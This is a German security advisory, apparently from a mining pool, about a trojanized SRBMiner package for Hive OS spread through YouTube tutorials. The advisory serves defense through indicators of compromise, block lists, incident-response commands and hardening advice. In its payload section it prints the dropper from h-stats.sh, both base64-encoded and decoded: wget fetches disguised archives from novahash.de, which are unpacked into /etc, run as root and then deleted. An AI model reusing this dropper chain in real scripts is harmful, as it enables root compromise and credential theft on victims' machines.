⚠️ Sicherheitswarnung · Hohe Priorität

Trojanisiertes SRBMiner-3.2.5-Paket im Umlauf
Was Miner wissen müssen — in der Reihenfolge, in der es sie interessiert

Ein gefälschtes SRBMiner-Multi-Archiv wird von miningrepositories.blog ausgeliefert und über einen GitLab-Spiegel unter gitlab.com/hiveos-custom/m gespiegelt, beworben über YouTube-Tutorials des Kanals „Argenminer“, mit Setup-Anleitung auf anotepad.com. Der Payload lädt per Hive-OS-Stats-Skript alle zehn Sekunden eine Stage-2 mit Root-Rechten von novahash.de nach — was man, freundlich gesagt, als unverfroren bezeichnen darf.

Veröffentlicht am 17. April 2026 · Aktualisiert am 1. Mai 2026 · Suprnova.cc · Mining-Pools seit 2013

✅ Status-Update · 1. Mai 2026

Der Argenminer-YouTube-Kanal ist weg.

Nach den koordinierten Takedown-Anträgen und Meldungen, die wir bei YouTube eingereicht haben, hat die Plattform den gesamten Argenminer-Kanal entfernt — jedes Tutorial-Video, das das trojanisierte Paket beworben hat, einschließlich der in diesem Advisory verlinkten Videos (Video-IDs Id3nMIt18EE für das Vertcoin-Tutorial und xiA81jvYFJs für das LuckyPepe-Tutorial), ist jetzt offline.

Der primäre Zugangskanal der Kampagne für neue Opfer ist abgeschnitten. Die Malware selbst, der GitLab-Spiegel, die anotepad-Notiz und novahash.de existieren möglicherweise noch irgendwo im Netz — und jede bereits kompromittierte Rig bleibt kompromittiert, also gelten die ursprünglichen Hinweise unten weiterhin. Aber der YouTube-Kanal, der das öffentliche Gesicht dieser Kampagne war, existiert nicht mehr, und der wirksamste Rekrutierungskanal des Akteurs ist tot.

⚠️ Falls Sie dieses Paket installiert haben

Nicht von Hand säubern. Rig neu aufsetzen.

Das h-stats.sh-Skript in diesem Archiv läuft als Root bei jedem Hive-OS-Stats-Poll — rund alle zehn Sekunden, solange das Rig läuft. Es lädt eine Stage-2 herunter, führt sie aus, und räumt anschließend die sichtbaren Spuren weg. Werden die Dateien von Hand gelöscht, sind sie beim nächsten Poll wieder da. Freundlich gemeint ist das nicht.

Auf dieser Rechte-Ebene ist dem Gerät nicht mehr zu trauen. Das Rig muss von einem sauberen Betriebssystem-Image komplett neu installiert werden, und sämtliche Zugangsdaten, die je mit dem Gerät in Berührung kamen, müssen rotiert werden — Pool-Konten und API-Schlüssel, SSH-Schlüssel, auf der Platte gespeicherte Wallet-Seeds, gespeicherte Browser-Sitzungen, alles. Zusätzlich jedes weitere Gerät prüfen, das Zugangsdaten mit dem betroffenen Rig teilt — Lateral Movement ist bei dieser Art Angreifer durchaus üblich.

Uns ist klar, dass „Rig neu aufsetzen“ an einem Donnerstag nicht das ist, was man hören möchte. Es ist trotzdem die einzige richtige Antwort.

Selbsterkennung: Wer ab dem 16. April 2026 ein Rig nach einem YouTube-Tutorial des Kanals „Argenminer“ (youtube.com/@Argenminer) für C64Chain, Qubit (QTC), Vertcoin (VTC) oder LuckyPepe (LPEPE) eingerichtet hat; wessen Flightsheet-install_url auf miningrepositories.blog oder gitlab.com/hiveos-custom/m zeigt; wer einer Anleitung aus einer anotepad.com-Notiz gefolgt ist (z. B. anotepad.com/notes/a7ycensj); oder wem einer dieser Links in einem der genannten Coin-Discords zugespielt wurde — der ist auf genau diesem Weg an das Archiv gekommen. Das Rig als kompromittiert behandeln und oben genannte Schritte durchziehen.

Kurzfassung

Jemand verteilt ein präpariertes SRBMiner-Multi-3.2.5-Paket über miningrepositories.blog und einen GitLab-Spiegel unter gitlab.com/hiveos-custom/m. Die Kampagne wird über YouTube-Tutorials des Kanals „Argenminer“ beworben, der die Setup-Anleitung (Wallet, Pool, install_url) auf anotepad.com-Notizen ablegt — z. B. anotepad.com/notes/a7ycensj — und bislang C64Chain, Qubit (QTC), Vertcoin (VTC) sowie LuckyPepe (LPEPE) ins Visier genommen hat. Die Miner-Binary wirkt legitim und dient als Tarnung; der bösartige Teil steckt in h-stats.sh als base64-codierter Block, der bei jedem Hive-OS-Stats-Poll zwei angebliche Bilder (tatsächlich ZIP-Archive) von novahash.de lädt, sie nach /etc/ extrahiert, die enthaltenen Shell-Skripte als Root ausführt und danach aufräumt. Wer das Archiv auf irgendeinem Rig installiert hat: Rig neu aufsetzen. novahash.de, miningrepositories.blog und gitlab.com/hiveos-custom/m an der Firewall blockieren. SRBMiner ausschließlich von github.com/doktor83/SRBMiner-Multi/releases beziehen und den SHA256 gegen den veröffentlichten Wert prüfen.

IOCs — für die Kurzentschlossenen

Alles Wichtige für Defender in einem Block. Ausführliche Details weiter unten, aber wer nur seine Flotte prüfen will, fängt hier an.

Netzwerk (blockieren)
Verteiler-Domains
miningrepositories.blog
gitlab.com/hiveos-custom/m (Raw-Content-Pfade unter diesem Repo)
Stage-2-C2-Domain
novahash.de
Stage-2-URLs
https://novahash.de/fileslab/recuaikaan.png
https://novahash.de/fileslab/mqtato-fla.jpg
Trojanisierte Archiv-URLs
https://miningrepositories.blog/srbminer-3.2.5.tar.gz
https://gitlab.com/hiveos-custom/m/-/raw/main/srbminer-3.2.5.tar.gz
Vom Angreifer kontrollierte Setup-Anleitungsseite
https://anotepad.com/notes/a7ycensj (zuletzt aktualisiert am 19.04.2026; Inhalt kann rotiert werden)
Werbe-Kanal (YouTube)
https://www.youtube.com/@Argenminer
Bekanntes Video: https://www.youtube.com/watch?v=Id3nMIt18EE („VERTCOIN ! Top GPU Mining | HIVEOS Easy Flight Sheet Tutorial Pool & Wallet.“)
Dateisystem-Artefakte (möglicherweise nicht vorhanden — Dropper räumt selbst auf)
/etc/recuaikaan.png
/etc/recuaikaan.zip
/etc/recuaikaan.sh
/etc/mqtato-fla.jpg
/etc/mqtato-fla.zip
/etc/mqtato-fla.sh
Hashes (Tarn-Miner-Binary)
SHA256 (srbminer_bin)
9d69228bce9ad3f1cde0f7fa0141e7588922227ee67b3c3f12788a0429909d06
BuildID (srbminer_bin)
fc2487ec223c91039748e53c08328af91260cd8c

Die Dateisystem-Artefakte werden nach jedem Lauf gelöscht — ihr Fehlen bedeutet also nicht, dass das System sauber ist. Nur ihr Vorhandensein ist schlüssig. Beurteilen Sie lieber anhand von Logs, anhand des Inhalts von h-stats.sh auf der Platte und anhand ausgehenden Traffics zu novahash.de.

Verteilungsweg

Das Paket wird von zwei verschiedenen, vom Angreifer kontrollierten Vertriebspunkten angeboten — mit mindestens einer weiteren Staging-Schicht auf einem öffentlichen Pastebin-ähnlichen Dienst. Alle drei hosten dasselbe trojanisierte srbminer-3.2.5.tar.gz, und alle drei sind so gewählt, dass sie für einen Operator auf der Suche nach Miner-Binaries wie generische, community-betriebene Ressourcen wirken:

Bekannte Vertriebs-Endpunkte
Warnsignale auf einen Blick

Auslieferung: YouTube-Tutorials und Discord-Seeding (beobachtet)

Das trojanisierte Archiv liegt nicht einfach auf einer zufälligen Domain herum und wartet, dass jemand darüber stolpert. Es wird gezielt über Kanäle beworben, denen Miner vertrauen, und die Werbe-Schicht ist größer und planvoller, als die ursprüngliche Warnung vom 17. April 2026 es beschrieb. Stand 19. April 2026 ergibt sich folgendes Bild:

Beobachtete Verbreitung (Stand 19.04.2026)
Hinweis für Pool-Betreiber: legitime Pools werden als Kulisse missbraucht

Jedes Argenminer-Flightsheet zeigt auf einen echten, funktionierenden Drittanbieter-Pool, damit das Rig des Opfers tatsächlich zu minen scheint (erfasste Beispiele sind vertcoin.cedric-crispin.com:3334 für VTC und Suprnovas eigener Pool lpepe.suprnova.cc im LPEPE-Tutorial). Pool, Worker-Name und Wallet-ID im Flightsheet sind allesamt Kulisse — die Monetarisierung des Angreifers ist Root-Zugriff auf das Rig des Opfers, nicht das kleine Rinnsal an Mining-Gebühren. Wer einen Pool betreibt, dessen Hostname in einem aus einem Argenminer-Video oder einer anotepad-Notiz verlinkten Flightsheet auftaucht, ist nicht „infiziert“, wird aber als Legitimitätsschicht für fremde Malware-Kampagnen benutzt. Überlegen Sie, das Flightsheet öffentlich zu dementieren und Ihre Nutzer auf dieses Advisory hinzuweisen. (Suprnova hat genau das für das LPEPE-Tutorial getan, das auf unseren Pool zeigt; siehe das oben verlinkte LPEPE-Video.)

Was das über das Vorgehen des Angreifers verrät

Das ist Social Engineering, kein Drive-by-Download. Jeder Schritt des Ablaufs ist bewusst so gewählt, dass die Deckung des Opfers runtergeht:

  1. Kleine Coins mit aktiven Discord-Communities und einem stetigen Zustrom an Einsteigern aussuchen. C64Chain, QTC, ein länger laufender Nischencoin wie Vertcoin oder ein brandneuer Micro-Cap-Coin wie LuckyPepe (LPEPE) sind genau der Typ Ziel, bei dem ein neuer Miner in den Discord kommt, fragt, wie er loslegen kann, und dankbar den ersten Link annimmt, den ihm jemand Hilfsbereites in die Hand drückt. Große Coins werden kritischer geprüft, kleine werden gutgläubiger angenommen; brandneue praktisch überhaupt nicht geprüft.
  2. Ein funktionierendes Tutorial produzieren. Die YouTube-Videos zeigen Rigs, die tatsächlich minen, weil die Miner-Binary im Archiv ein echter, lauffähiger Miner ist (Tarnung) und das url-Feld des Flightsheets auf einen echten, lauffähigen Drittanbieter-Pool zeigt. Sichtbarer Beweis überzeugt: ein Video mit einlaufenden Accepted Shares ist mehr wert als tausend „vertrau mir“.
  3. Vertrauenswürdiges Hosting missbrauchen. Die install_url auf eine GitLab-Raw-Content-URL zeigen lassen (gitlab.com/hiveos-custom/m) und das Flightsheet-JSON auf einem GitLab-nahen, pastebin-artigen Dienst ablegen (anotepad.com). Der Download-Host ist Google-Klasse-Infrastruktur; der Flightsheet-Host ist ein URL-Verkürzer mit anderem Namen. Keines von beidem wird einem neugierigen Einsteiger verdächtig vorkommen.
  4. Erst Reputation aufbauen, dann bewaffnen. Sobald das Video existiert, weitere Videos auf demselben Kanal dazukommen und ein paar Kommentare sagen „hat bei mir funktioniert, danke!“, trägt sich der Link selbst weiter — jeder neue Zuschauer sieht Social Proof, bevor er einen Grund zum Misstrauen sieht.
  5. In Einsteiger-Kanäle streuen. Den anotepad- oder Archiv-Link in Discord-Kanäle posten, wo Neulinge um Setup-Hilfe bitten. Der Payload läuft beim ersten Stats-Poll; der Angreifer braucht vom Opfer nichts außer „mach das Tutorial nach“.
  6. Darauf setzen, dass Community-Moderatoren keine Archive oder Flightsheets auditieren. Kaum ein Coin-Discord hat die Ressourcen, jedes „hilfreiche“ Tarball, das in seinem Mining-Kanal landet, zu reverse-engineeren, oder die wal_id in einem geteilten Flightsheet mit dem Absender abzugleichen. Ein freundlicher Nutzer mit YouTube-Kanal wirkt wie ein Community-Mitglied, nicht wie eine Bedrohung.
  7. Artefakte rotieren, Kanal behalten. Die anotepad-Notiz kann jederzeit bearbeitet werden — Wallet-ID, Pool-URL, install_url sind in Sekunden geändert. Der YouTube-Kanal ist die dauerhafte Ressource; der anotepad-Link in der Videobeschreibung ist die Weiche. Takedowns einzelner Archiv-Hosts kippen die Kampagne nicht, solange der Kanal online bleibt.
Das Mitnehmen

Ein funktionierendes YouTube-Tutorial und ein freundlicher Discord-Post sind keine Vertrauenssignale. Das Video des Angreifers zeigt fast sicher ein korrekt minendes Rig — weil es das tut. Der Schaden sitzt in h-stats.sh, läuft als Root, auf dem Rig, das der Zuschauer gerade liebevoll konfiguriert hat. Für Einsteiger: Miner-Downloads nur aus dem offiziellen Projekt-Repository, SHA256 jedes Mal prüfen. Für Coin-Discords: im Mining-Kanal einen festen Hinweis pinnen — „keinen Archiven vertrauen, die hier gepostet werden, solange sie nicht aus dem offiziellen Projekt stammen“.

Wer Teil der C64Chain-, Qubit (QTC)-, Vertcoin (VTC)- oder LuckyPepe (LPEPE)-Community ist und sein Rig nach einem der Argenminer-Tutorials eingerichtet oder den Link an Freunde weitergegeben hat — bitte dieses Advisory in der Community teilen und jedes Rig, das nach einer dieser Anleitungen aufgesetzt wurde, als kompromittiert behandeln.

Was im Archiv steckt

Das Archiv ist eine vollständige Hive-OS-Custom-Miner-Integration — und eine Minerstat-Integration (mmp-*) ist gleich mit dabei. Echte Distributionen liefern das eine oder das andere aus, nicht beides, wodurch die Kombination allein schon verräterisch ist.

DateiGrößeStatus
h-manifest.conf616 BSauber (nur kosmetische Anpassungen)
h-run.sh764 BSauber (nur kosmetische Anpassungen)
h-config.sh205 BSauber
h-stats.sh8.646 BBÖSARTIG — enthält Dropper
mmp-stats.sh4.116 BSauber
mmp-external.conf63 BSauber (Versionsabweichung)
srbminer_bin20.309.184 B (~20 MB)Vermutlich echt/fast echt (Tarnung)

Verräterische Spuren der Neuverpackung

Keines der folgenden Merkmale ist für sich genommen bösartig — sie sind die diagnostischen Hinweise, dass das Paket nicht von dort kommt, woher es behauptet zu kommen:

Der Payload: h-stats.sh

h-stats.sh ist zum größten Teil — ärgerlicherweise — ein vollkommen funktionaler Hive-OS-Stats-Parser. Er fragt die HTTP-API des Miners auf 127.0.0.1:$MINER_API_PORT ab, liest Hashrate, Shares, Temperaturen und Lüfterwerte für GPU- und CPU-Worker, kommt mit Single- und Dual-Algo-Mining zurecht und liefert gültiges Stats-JSON an den Hive-Agenten zurück. Das ist keine Nebensächlichkeit, sondern essentielle Tarnung: Würde das Skript Fehler werfen, erschiene das Rig bei Hive als offline und der Operator würde binnen Minuten nachsehen.

Nach der legitimen Stats-Logik und vor den abschließenden Fallback-Zuweisungen wurde dieser Block eingefügt:

p="bm9odXAgc3VkbyB3Z2V0IC1xIGh0dHBzOi8vbm92YWhhc2guZGUvZmlsZXNsYWIvcmVjdWFpa2Fhbi5wbmcg
LU8gL2V0Yy9yZWN1YWlrYWFuLnppcCAmJiBzdWRvIHVuemlwIC1xIC1vIC9ldGMvcmVjdWFpa2Fhbi56aXAgLWQg
L2V0YyAmJiBzdWRvIGJhc2ggL2V0Yy9yZWN1YWlrYWFuLnNoIDsgc3VkbyB3Z2V0IC1xIGh0dHBzOi8vbm92YWhh
c2guZGUvZmlsZXNsYWIvbXF0YXRvLWZsYS5qcGcgLU8gL2V0Yy9tcXRhdG8tZmxhLnppcCAmJiB1bnppcCAtcSAt
byAvZXRjL21xdGF0by1mbGEuemlwIC1kIC9ldGMgJiYgYmFzaCAvZXRjL21xdGF0by1mbGEuc2ggOyBybSAvZXRj
L21xdGF0by1mbGEuemlwIDsgcm0gL2V0Yy9tcXRhdG8tZmxhLnNoIDsgcm0gL2V0Yy9yZWN1YWlrYWFuLnNoIDsg
cm0gL2V0Yy9yZWN1YWlrYWFuLnppcCA+IC9kZXYvbnVsbCAyPiYxICY="
nohup sh -c "$(echo "$p" | base64 -d)" > /dev/null 2>&1 &

Dekodiert lautet der base64-Block:

nohup sudo wget -q https://novahash.de/fileslab/recuaikaan.png -O /etc/recuaikaan.zip \
  && sudo unzip -q -o /etc/recuaikaan.zip -d /etc \
  && sudo bash /etc/recuaikaan.sh ; \
sudo wget -q https://novahash.de/fileslab/mqtato-fla.jpg -O /etc/mqtato-fla.zip \
  && unzip -q -o /etc/mqtato-fla.zip -d /etc \
  && bash /etc/mqtato-fla.sh ; \
rm /etc/mqtato-fla.zip ; rm /etc/mqtato-fla.sh ; \
rm /etc/recuaikaan.sh ; rm /etc/recuaikaan.zip > /dev/null 2>&1 &

Ablauf, Schritt für Schritt

  1. Zwei vermeintliche Bilddateien (.png und .jpg) werden per wget von novahash.de geladen. Die Bildendungen sind Tarnung — der eigentliche Inhalt sind ZIP-Archive. Eine bekannte Methode, um naive Egress-Filter auszutricksen, die Skript- und Archiv-Traffic prüfen, Bilder aber durchwinken.
  2. Jedes Archiv wird nach /etc/ geschrieben, in .zip umbenannt und mit unzip -o (Überschreiben) entpackt.
  3. In jedem Archiv steckt ein Shell-Skript (recuaikaan.sh, mqtato-fla.sh), das anschließend ausgeführt wird — das erste explizit mit sudo, das zweite im bereits bestehenden Root-Kontext des Hive-Agenten.
  4. Alle vier Artefakte (beide .zip-Dateien und beide .sh-Skripte) werden anschließend aus /etc/ gelöscht. Das säubert den Dropper-Fußabdruck: Eine Nachschau in /etc/ findet nichts mehr, während das, was die Stage-2-Skripte anderswo installiert haben, resident bleibt.
  5. Die gesamte Kette läuft im Hintergrund per nohup … &, damit die legitime Stats-Ausgabe weder blockiert noch verzögert wird. Hive sieht weiterhin ein „gesundes“ Rig.

Warum h-stats.sh die perfekte Stelle ist

Warum diese Platzierung so fies ist, in einfachen Worten

Was das dem Angreifer einbringt:

Stellen Sie sich vor, jemand wirft einen Zettel in Ihren Briefkasten, auf dem steht: „Bitte die Hintertür offen lassen.“ Und wirft denselben Zettel alle zehn Sekunden erneut ein. Für immer. Und räumt den vorherigen vorher jedes Mal weg. Sie können das nicht wegsortieren. Sie müssen das Schloss wechseln.

Der Tarn-Miner: srbminer_bin

Die im Paket enthaltene Binary sieht nach einem legitimen oder nahezu legitimen SRBMiner-Multi-Build aus. Aus Angreifersicht besteht ihre Aufgabe darin, unauffällig zu sein:

Der Plan des Angreifers setzt darauf, dass der Miner plausible Hashrate und Shares produziert, damit Hive- und Minerstat-Dashboards normal aussehen und dem Operator kein Anlass zum Nachsehen bleibt. Alle beobachtete bösartige Funktionalität liegt in h-stats.sh; die Binary ist nicht der Angriffsvektor.

Empfehlung zur Verifikation

Den SHA256 der Binary mit den bekannten Hashes auf github.com/doktor83/SRBMiner-Multi/releases vergleichen oder die Datei an VirusTotal senden. Ein Mismatch mit jedem veröffentlichten SRBMiner-Hash reicht, um die Binary unabhängig von diesem Advisory als verdächtig zu behandeln.

Vollständige Indikatoren der Kompromittierung

Netzwerk

Werbe- / Social-Engineering-Kanal

Dateisystem (Dropper-Artefakte)

Werden nach Ausführung vom Dropper gelöscht — Abwesenheit ist kein Freibrief:

/etc/recuaikaan.png
/etc/recuaikaan.zip
/etc/recuaikaan.sh
/etc/mqtato-fla.jpg
/etc/mqtato-fla.zip
/etc/mqtato-fla.sh

Datei-Hashes

Prozess- und Verhaltenssignaturen

Paket-Warnzeichen (nützlich zum Auffinden ähnlicher trojanisierter Pakete)

Incident-Response-Checkliste

Wer das Paket auf irgendeinem Rig oder Server installiert hat, arbeitet die folgenden Punkte der Reihe nach ab. Leicht verdriesslich dabei. Das ist die korrekte Haltung.

1

Isolieren

Das betroffene Rig sofort vom Netzwerk trennen. Nicht zuerst herunterfahren — der Speicherinhalt kann nützlich sein, und manche Persistenzmechanismen werden erst beim Booten aktiv.

2

C2 überall blockieren

novahash.de an DNS-Sinkhole und Firewall-Deny-Listen eintragen — im gesamten Netzwerk, nicht nur auf dem betroffenen Rig. Lateral Movement steht im Raum; andere Systeme können mit angetastet worden sein.

3

Snapshot für die Forensik (falls gewünscht)

Wer die Geduld mitbringt: Vor der Bereinigung ein Disk-Image erzeugen und, wenn Werkzeuge vorhanden sind, den Speicher dumpen. Wer nicht — verständlich, dann direkt zur Bereinigung.

4

Dropper-Artefakte prüfen

ls -la /etc/recuaikaan* /etc/mqtato* 2>/dev/null
5

Userland-Rootkit-Hinweise prüfen

cat /etc/ld.so.preload   # sollte leer sein oder nicht existieren
6

Nach kürzlich geänderten Dateien suchen

find /etc /usr/local/bin /usr/local/sbin /root /tmp /var/tmp /dev/shm \
     -mtime -30 -type f -ls 2>/dev/null
7

Persistenzmechanismen prüfen

crontab -l
for u in $(cut -f1 -d: /etc/passwd); do crontab -u "$u" -l 2>/dev/null; done
ls -la /etc/cron.* /etc/cron.d/ /var/spool/cron/
systemctl list-unit-files --state=enabled
systemctl list-timers --all
8

SSH-Backdoors aufspüren

find / -name "authorized_keys" 2>/dev/null -exec ls -la {} \; -exec cat {} \;
grep -E '^(PermitRootLogin|PasswordAuthentication|AuthorizedKeysFile)' /etc/ssh/sshd_config
9

Ausgehende Verbindungen prüfen

ss -tnp | grep -E '(srbminer|sh|wget|curl)'
10

Zweite Stufe: Persistenz und Exfiltration prüfen

Das hier ist kein Cryptojacker — der Angreifer will Root-Persistenz und das, was sie ihm danach ermöglicht: die Platte nach Wallet-Seed-Dateien und Keystores durchsuchen, Pool-Credentials und SSH-Keys aus Config-Dateien herausziehen, auf andere Maschinen im LAN pivotieren, das Rig in ein Botnetz oder einen Residential-Proxy-Pool einreihen. Auf Spuren dieser Post-Compromise-Aktivität achten: versteckte Binaries an unauffälligen Pfaden, manipulierte Shell-RC-Dateien (~/.bashrc, ~/.profile, /etc/profile.d/), neue Kernelmodule, unerwartete ausgehende Verbindungen zu anderen Hosts als dem eigenen Pool und jeder Prozess, den das eigene Miner-Setup nicht gestartet hat und der als Root läuft.

11

Rootkit-Scanner laufen lassen

chkrootkit
rkhunter --check --skip-keypress
12

Sudo-Logs prüfen

grep -E 'wget|bash /etc' /var/log/auth.log /var/log/secure 2>/dev/null
13

Falls ein Indikator anschlägt — neu aufsetzen. Punkt.

Userland-Code, der in kurzen Intervallen als Root läuft, ist per Hand nicht zuverlässig zu entfernen. Betriebssystem auf dem Rig neu installieren, alle Zugangsdaten rotieren, die das Gerät berührt haben (Pool-Konten, SSH-Schlüssel, irgendwo auf der Platte gespeicherte Wallet-Seeds) und sämtliche Geräte prüfen, die Zugangsdaten mit dem betroffenen Rig teilen. Gute Gelegenheit, ein paar Dinge aufzuräumen, die man ohnehin länger vor sich hergeschoben hat.

Härtung: so landen Sie gar nicht erst hier

Ein paar Gewohnheiten, die genau das hier von Anfang an verhindert hätten. Keine davon neu, alle ein bisschen langweilig — langweilig ist das angestrebte Gefühl.

1. Miner nur aus verifizierten Quellen laden

Für SRBMiner konkret: github.com/doktor83/SRBMiner-Multi/releases. Für jeden anderen Miner: offizielle Projektseite auf GitHub suchen — in der Regel verlinkt von der Getting-Started-Seite des Pools. Alles andere ist Glaubensfrage.

2. Immer SHA256 prüfen

Offizielle Miner-Releases veröffentlichen Prüfsummen. sha256sum auf den Download, Vergleich mit dem veröffentlichten Wert. Das dauert acht Sekunden. Ein Rig neu aufzusetzen dauert deutlich länger.

3. Skepsis gegenüber „custom“- oder „patched“-Miner-Paketen

Sofern nicht aus einer bekannten, vertrauenswürdigen Community-Quelle. Stats-Integrations-Wrapper sind eine Lieblings-Injection-Stelle, gerade weil die meisten Operatoren sie nie lesen. Das ist exakt der Grund, warum wir hier sind.

4. Integrationsskripte vor dem Erststart lesen

30 Sekunden less h-stats.sh, bevor ein Flight-Sheet auf einen neuen Custom-Miner zeigt. Lange kodierte Strings, Netzwerkaufrufe zu unbekannten Domains, Schreibzugriffe auf /etc/ oder /usr/local/ — jedes Einzelne davon ist Anlass, kurz innezuhalten.

5. Egress-Filterung

Rigs müssen keine beliebigen Domains erreichen. Pool-IPs auf Allowlist, alles andere blockieren. Ein ordentlich gefiltertes Rig lässt sich auch mit laufendem bösartigem Skript nicht stagen, weil es keine Quelle für Stage-2 findet.

6. Ausgehende Verbindungen überwachen

Ein Rig, das HTTPS-Anfragen an irgendetwas außerhalb Ihres Pools richtet, ist grundsätzlich verdächtig. Das ist keine Paranoia — das ist die billigste Detektion, die Sie haben.

7. Im Kopf behalten, was als Root läuft

Unter Hive OS läuft der Hive-Agent als Root, und das user-Konto hat passwortloses sudo. Jedes Skript, das der Agent aufruft, hat damit effektiv Root-Rechte. Bewusst damit umgehen. Falls Ihr Framework unprivilegierte Mining-Nutzer erlaubt, verwenden Sie sie.

Ein Wort von Suprnova

Pool-Betreiber und deren Miner sind für diese Art Angriff eine besonders lohnende Zielgruppe. Ein trojanisierter Miner auf einem Rig ist kein Cryptojacking — er ist schlimmer. Sobald der Dropper Root hat, kann er die Platte nach Wallet-Seed-Dateien und gesicherten Keystores durchsuchen, Pool-Credentials und SSH-Keys aus Config-Dateien herausziehen, Browser-Sessions abgreifen, das Rig in ein Botnetz oder einen Residential-Proxy-Pool einreihen und in die weitere Infrastruktur pivotieren. Die Mining-förmige Hülle ist nur der Deckel auf der Kiste; das eigentliche Interesse des Angreifers ist alles darin. Unsere Nutzer sind im Schnitt technischer, wertvoller und gezielter ins Visier genommen als die allgemeine Population der „Menschen, die Dinge herunterladen“ — und diese Aufmerksamkeit ist, unter dem Strich, kein Kompliment.

Wenn Ihnen ein verdächtiger Miner-Download, ein ungewöhnliches Archiv oder eine Discord-/Telegram-DM mit einem „custom“ oder „patched“ Miner auffällt, leiten Sie es bitte an admin@suprnova.cc weiter oder posten Sie es in unserem Discord. Wir sehen es uns an, aktualisieren dieses Advisory bei Bedarf und warnen die Community. Gürtel, Hosenträger und ein gesundes Maß an gemeinschaftlicher Paranoia — die drei Säulen eines glücklichen Mining-Rigs.

Fazit

Das Archiv unter https://miningrepositories.blog/srbminer-3.2.5.tar.gz und die identische Kopie unter https://gitlab.com/hiveos-custom/m/-/raw/main/srbminer-3.2.5.tar.gz sind trojanisiert. Die Miner-Binary ist Tarnung; der eigentliche Payload steckt in h-stats.sh und kontaktiert novahash.de etwa alle zehn Sekunden — als Root, solange das Rig läuft.

Der YouTube-Kanal @Argenminer ist die Werbe-Schicht. Seine Videos führen Zuschauer Schritt für Schritt durch das Hive-OS-Flightsheet-Setup und verlinken — über eine anotepad.com-Notiz — auf die trojanisierte install_url. Wer ab dem 16. April 2026 ein Argenminer-Tutorial für C64Chain, Qubit (QTC), Vertcoin (VTC) oder LuckyPepe (LPEPE) nachgebaut hat, muss das Rig als kompromittiert behandeln.

Wer dieses Paket auf irgendeinem Rechner installiert hat, muss ihn neu aufsetzen. Nicht „untersuchen“. Nicht „bereinigen“. Neu aufsetzen. Alle Zugangsdaten, die das Gerät je berührt haben, rotieren. Alle Geräte prüfen, die Zugangsdaten mit ihm geteilt haben. Eine mittlere Option, die ebenfalls korrekt wäre, gibt es nicht.

novahash.de, miningrepositories.blog und die Raw-Content-Pfade unter gitlab.com/hiveos-custom/m blockieren. An DNS und an der Egress-Firewall. Überall, nicht nur auf dem betroffenen Rig. Die anotepad.com-Notiz unter anotepad.com/notes/a7ycensj als bekannte, vom Angreifer kontrollierte Seite behandeln, auch wenn sich ihr Inhalt ändert.

Miner nur aus verifizierten Upstream-Quellen laden und jedes Mal den SHA256 prüfen. Die offiziellen SRBMiner-Releases liegen auf github.com/doktor83/SRBMiner-Multi/releases. Alles andere, das vorgibt, SRBMiner zu sein — ein Mining-Tools-Blog, ein beliebiger GitLab-Account, ein Pastebin-Link aus einem YouTube-Tutorial — ist bestenfalls nicht vertrauenswürdig.

Verwandte Artikel

Mining-Pool-Sicherheit

Wie Mining-Pools sich und ihre Miner gegen DDoS, Exploits und andere Bedrohungen schützen.

Mining-Hardware-Leitfaden

Praktischer Leitfaden zu Auswahl und Pflege von Mining-Hardware — inklusive der langweiligen Software-Seite.

Ein Tag im Leben eines Pool-Betreibers

Wenn kompromittierte Hosts auf den Pool zeigen, verlieren alle — auch der Dienstagmorgen des Betreibers.